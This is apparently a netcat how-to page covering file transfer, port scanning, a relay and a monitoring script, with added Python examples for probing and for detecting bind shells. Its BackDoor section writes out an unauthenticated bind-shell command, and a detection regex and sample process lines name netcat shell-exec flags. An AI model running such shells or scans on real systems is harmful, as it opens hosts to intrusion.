netcat (nc) [a sharp knife on the network]

Updated: 2018-09-21



安裝

 

apt-get install netcat

# On Debian/Ubuntu "netcat" is a metapackage that pulls in either
# netcat-traditional or netcat-openbsd, and nmap ships a third implementation
# (ncat). The flags differ between them: -e (hand the connection to a program)
# exists in netcat-traditional and ncat but not in the OpenBSD build, and the
# OpenBSD build takes the listen port as a plain argument after -l instead of
# via -p. The examples on this page use the netcat-traditional flag style;
# run "nc -h" to see which variant you actually have before copying them.

 


Telnet

 

# nc passes the stream through untouched (binary data is just data); -t makes
# it answer Telnet option negotiation so a telnet daemon will accept the session.
# A port is always required.

nc -t 192.168.1.2 23

# use another source ip (it must be an address this host owns)

nc -s <source_ip> -t <target> 25

opt:

-s, --source addr

-p, --source-port port

-C, --crlf                            # Use CRLF for EOL sequence

 


Port Listening (Chatting)

 

# Listen on TCP 12345. From the other host, connect to this port with plain nc;
# each side's stdin is sent to the other side's stdout until one of them
# closes. Nothing is encrypted or authenticated, so treat it as a cleartext
# channel that anyone on the path can read.

nc -l -p 12345

 


Transferring File

# Publish the file (send)

$ tar -jcf - /data | nc -l -p 6666

# Fetch the file (receive)

$ nc <peer ip> 6666 | tar -jxf -

# Notes: tar needs "-" as the archive name to read from stdin. With
# netcat-traditional the sending nc keeps the connection open after tar has
# written everything, so add -q 1 on the sender (the OpenBSD build uses -N) to
# close the socket once stdin hits EOF; otherwise the receiver's tar never sees
# the end of the archive. Nothing here is authenticated or encrypted: the first
# host to connect to port 6666 gets the whole archive, so use this only on a
# trusted network and compare a checksum (e.g. sha256sum of the archive) on
# both ends.

 


Port Scanning

 

$ nc -v -n -z -w 1 192.168.1.2 1-1000

-n     # no DNS lookups (pass addresses, not names)

-z     # Zero-I/O mode: no data is transferred in either direction.

In connect mode

it means that as soon as the port is open the connection is shut down and closed again. A full TCP handshake still takes place, so the probe is not stealthy: the target sees (and can log) a completed connection on every open port.

In listen mode

it makes netcat refuse all incoming connections, so it just runs until the timeout (if set) or waits forever.

-w 1   # time out the connect (and the final network read) after 1 second

The exit status is the reliable signal for scripts: 0 when the connection succeeded, 1 when it was refused or timed out. The "succeeded!" text below is printed by the OpenBSD build and differs between variants, so do not parse it.

i.e.

Success

nc -z -w 1 192.168.251.42 1433

Connection to 192.168.251.42 1433 port [tcp/ms-sql-s] succeeded!

Failure

nc -z -w 1 192.168.251.42 1434

echo $?

1

UDP

 

-u      # Use UDP instead of the default TCP.

-v      # More verbose output.

-w N    # timeout in seconds

i.e.

nc -v -w 1 -u 192.168.123.33 500

Connection to 192.168.123.33 500 port [udp/isakmp] succeeded!

 * With -v (or -z), nc sends three one-byte UDP datagrams to the other side and reports "succeeded" unless an ICMP port-unreachable comes back. UDP has no handshake, so "succeeded" only means nothing refused the packet: a closed port behind a firewall that drops ICMP looks exactly like an open one, and a port that is genuinely open but silent looks the same too.

# send a single UDP datagram (its payload is the newline produced by echo)

echo '' | nc -u -w 1 datahunter.org 4001
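The following is an added example, not code from the original page: it reimplements at socket level what the two probes above do, so the difference between a TCP `-z` result and a UDP "succeeded" is visible in code. `tcp_probe` returns nc's exit status (0/1) for a zero-I/O connect, `tcp_scan` applies it to a port list the way `nc -z host 1-1000` does, and `udp_probe` sends the same three one-byte datagrams `nc -u -v` sends and then distinguishes a reply, an ICMP port-unreachable (which nc treats as failure) and silence (which nc reports as success). `demo()` stands up its own local listeners on 127.0.0.1 so the block runs offline; those ports and the payload are constructed for the example.

```python
"""Socket-level view of `nc -z -w 1 host port` and `nc -u -v -w 1 host port`.

Added example, not part of the original page. All listeners and ports are
created locally by demo(); nothing here talks to a real host.
"""
import socket
import threading


def tcp_probe(host, port, timeout=1.0):
    """Zero-I/O TCP check, like nc -z: connect, then shut down at once.

    Returns 0 when the handshake completed and 1 otherwise, mirroring nc's
    exit status so it can drive the same kind of `if` a shell script would.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.shutdown(socket.SHUT_RDWR)  # nothing is sent or read
        return 0
    except OSError:                      # refused, unreachable or timed out
        return 1


def tcp_scan(host, ports, timeout=1.0):
    """Return the open ports among `ports`, like `nc -z -w 1 host 1-1000`."""
    return [p for p in ports if tcp_probe(host, p, timeout) == 0]


def udp_probe(host, port, timeout=1.0, payload=b"X"):
    """UDP probe the way nc -u -v does it: three one-byte datagrams, then wait.

    'open'          : a reply datagram came back
    'closed'        : the kernel surfaced an ICMP port-unreachable (ECONNREFUSED)
    'open|filtered' : silence; nc prints "succeeded!" here, which is why a UDP
                      'success' from nc proves very little
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))          # on UDP this only records the peer
        try:
            for _ in range(3):           # nc -v sends three single-byte datagrams
                s.send(payload)
            s.recv(1024)
            return "open"
        except ConnectionRefusedError:   # ICMP unreachable from the previous send
            return "closed"
        except socket.timeout:
            return "open|filtered"


def demo():
    """Create local TCP/UDP listeners, probe them, and return the results."""
    tcp_srv = socket.socket()
    tcp_srv.bind(("127.0.0.1", 0))
    tcp_srv.listen(1)
    open_port = tcp_srv.getsockname()[1]

    tmp = socket.socket()                # grab a free port number, then release it
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                          # nothing listens here any more

    udp_srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_srv.bind(("127.0.0.1", 0))
    udp_port = udp_srv.getsockname()[1]

    def udp_echo():                      # constructed "open" UDP service: echoes one datagram
        data, peer = udp_srv.recvfrom(1024)
        udp_srv.sendto(data, peer)

    threading.Thread(target=udp_echo, daemon=True).start()

    results = {
        "open_port": open_port,
        "closed_port": closed_port,
        "tcp_open": tcp_probe("127.0.0.1", open_port),
        "tcp_closed": tcp_probe("127.0.0.1", closed_port),
        "scan": tcp_scan("127.0.0.1", [closed_port, open_port]),
        "udp_open": udp_probe("127.0.0.1", udp_port),
        "udp_closed": udp_probe("127.0.0.1", closed_port),
    }
    tcp_srv.close()
    udp_srv.close()
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On Linux the UDP probe of the unused port comes back as `closed` because the loopback interface delivers the ICMP port-unreachable; on a path where ICMP is filtered the same port would report `open|filtered`, which is exactly the ambiguity hidden behind nc's "succeeded!" line.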

 


Proxy

 

# Input (TCP Port: 1234) --> Web --> Output (TCP Port: 2345)

$ nc -l -p 1234 | nc www.google.com 80 | nc -l -p 2345

# This is a one-way pipeline, not a proxy in the usual sense: bytes sent to
# port 1234 go to the web server, and the web server's reply is delivered to
# whoever connects to port 2345, never back to the client on 1234. A real
# request/response relay has to return the reply on the same connection, which
# a plain pipe cannot do; the classic nc fix is a named pipe (mkfifo) that feeds
# the second nc's stdout back into the first nc's stdin.
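To show what a bidirectional relay has to do (the thing the one-way pipeline above cannot), here is an added Python example; it is not code from the original page. `start_relay` listens on a local port and, for the first client, copies bytes in both directions to a target and propagates each side's EOF as a half-close, which is what the fifo trick achieves with two nc processes. The target in `demo()` is a constructed local echo server standing in for the page's www.google.com:80, and the request bytes are made up for the example.

```python
"""Bidirectional TCP relay (what `nc -l ... < fifo | nc target port > fifo` does).

Added example, not part of the original page. Listens on 127.0.0.1 and
forwards one client connection to a target, copying bytes both ways.
"""
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src closes, then half-close dst.

    The half-close (SHUT_WR) passes the EOF on without tearing down the
    other direction, so the reply can still flow back.
    """
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_relay(target, bind_addr="127.0.0.1"):
    """Listen on an ephemeral port and relay the first client to target.

    target is a (host, port) tuple. Returns the port the relay listens on.
    """
    lsock = socket.socket()
    lsock.bind((bind_addr, 0))
    lsock.listen(1)

    def serve():
        client, _ = lsock.accept()
        lsock.close()                                # one client only in this example
        upstream = socket.create_connection(target, timeout=5)
        back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
        back.start()                                 # target -> client
        _pump(client, upstream)                      # client -> target
        back.join()
        client.close()
        upstream.close()

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()[1]


def start_echo_server():
    """Constructed stand-in for the real target: prefixes 'echo:' to what it gets."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(b"echo:" + data)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Send a constructed request through the relay and return the reply bytes."""
    target_port = start_echo_server()
    relay_port = start_relay(("127.0.0.1", target_port))
    with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
        c.sendall(b"GET / HTTP/1.0\r\n\r\n")
        c.shutdown(socket.SHUT_WR)          # our EOF travels through the relay to the target
        chunks = []
        while True:
            d = c.recv(4096)
            if not d:                       # target's EOF came back the same way
                break
            chunks.append(d)
    return b"".join(chunks)


if __name__ == "__main__":
    print(demo())
```

Because the reply arrives on the client's own connection, a browser or curl pointed at the relay port works as expected; with the page's three-nc pipeline it would hang waiting for a response that went to port 2345 instead.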

 


BackDoor

 

# Bind shell: whoever connects to TCP 12345 gets a shell running as the user
# that started nc, with no authentication or encryption whatsoever.

$ nc -l -p 12345 -e /bin/bash

# -e exists in netcat-traditional and in ncat but not in the OpenBSD build.
# Inbound connections are usually stopped by a firewall or NAT, which is why
# the reverse form (nc connecting out to a listener under the attacker's
# control, with the same -e) is what shows up far more often in practice.
# From the defender's side a bind shell like this is a netcat process owning a
# LISTEN socket, visible in "ss -lntp" or "netstat -lntp".
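The check a defender would run against the backdoor above, as an added example (not from the original page): parse `ss -lntp` for LISTEN sockets owned by a netcat binary, parse `ps -eo pid,user,args` for netcat processes started with an exec-style flag, and join the two by pid. The `ss` and `ps` lines are constructed to resemble a host where `nc -l -p 12345 -e /bin/bash` is running; the process names, pids and the extra `ncat` line are made up for the example.

```python
"""Spot netcat bind shells from listener and process listings.

Added example, not part of the original page. SS_SAMPLE and PS_SAMPLE are
constructed to look like `ss -lntp` and `ps -eo pid,user,args` output.
"""
import re

SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=811,fd=3))
LISTEN 0      1      0.0.0.0:12345       0.0.0.0:*         users:(("nc",pid=4242,fd=3))
LISTEN 0      511    127.0.0.1:80        0.0.0.0:*         users:(("nginx",pid=902,fd=6))
"""

PS_SAMPLE = """\
  PID USER     COMMAND
  811 root     /usr/sbin/sshd -D
 4242 www-data nc -l -p 12345 -e /bin/bash
 4250 root     ncat -lvp 4444 --sh-exec /bin/sh
 4260 bob      nc -l -p 8080
"""

# binaries that are netcat variants (names as they appear in ss/ps output)
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
# flags that hand the connection to a program: -e/-c (traditional, ncat), ncat's --*-exec
SHELL_FLAGS = re.compile(r"(?:^|\s)(?:-e|-c|--exec|--sh-exec|--lua-exec)(?:\s|=)")
# the users:(("name",pid=N,fd=M)) column printed by ss -p
SS_PROC = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


def netcat_listeners(ss_output):
    """Return [(name, pid, local_addr)] for LISTEN sockets owned by a netcat binary."""
    found = []
    for line in ss_output.splitlines()[1:]:      # skip the header
        cols = line.split()
        if len(cols) < 6 or cols[0] != "LISTEN":
            continue
        m = SS_PROC.search(line)
        if m and m.group(1) in NETCAT_NAMES:
            found.append((m.group(1), int(m.group(2)), cols[3]))
    return found


def exec_backdoors(ps_output):
    """Return [(pid, user, args)] for netcat processes started with an exec flag."""
    hits = []
    for line in ps_output.splitlines()[1:]:
        parts = line.split(None, 2)              # pid, user, rest of the command line
        if len(parts) < 3:
            continue
        pid, user, args = parts
        binary = args.split()[0].rsplit("/", 1)[-1]
        if binary in NETCAT_NAMES and SHELL_FLAGS.search(args):
            hits.append((int(pid), user, args))
    return hits


def correlate(ss_output, ps_output):
    """Join netcat listeners with their command lines by pid and flag shell spawners."""
    cmdline = {}
    for line in ps_output.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            cmdline[int(parts[0])] = (parts[1], parts[2])
    report = []
    for name, pid, laddr in netcat_listeners(ss_output):
        user, args = cmdline.get(pid, ("?", ""))
        report.append({
            "pid": pid, "user": user, "listen": laddr, "binary": name,
            "args": args, "spawns_shell": bool(SHELL_FLAGS.search(args)),
        })
    return report


if __name__ == "__main__":
    for entry in correlate(SS_SAMPLE, PS_SAMPLE):
        print(entry)
```

`ss -p` only shows the owning process for sockets the caller can see, so run the collection as root; a listener with no `users:` column is itself worth a look. A plain `nc -l -p 8080` with no exec flag is a listener but not a shell, which is why the two signals are reported separately.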

 

 


Scripts

 

Monitor a port and send an e-mail alarm

chk-port.sh

#!/bin/bash

# Probe one TCP port with a zero-I/O connect (nc -z) and mail an alarm when the
# connection fails. Meant to run from cron. Only nc's exit status is tested
# (0 = connected); the printed "succeeded!" text is variant-specific and is not
# parsed.

msg="IPSec_Fail - Server-X"
email="admin@domain1 admin@domain2"   # space-separated list, so it is left unquoted below

# check mssql
if ! nc -z -w 1 192.168.251.42 1433; then
        echo "$msg"
        echo "$msg" | mail -s "$msg" $email
fi

 
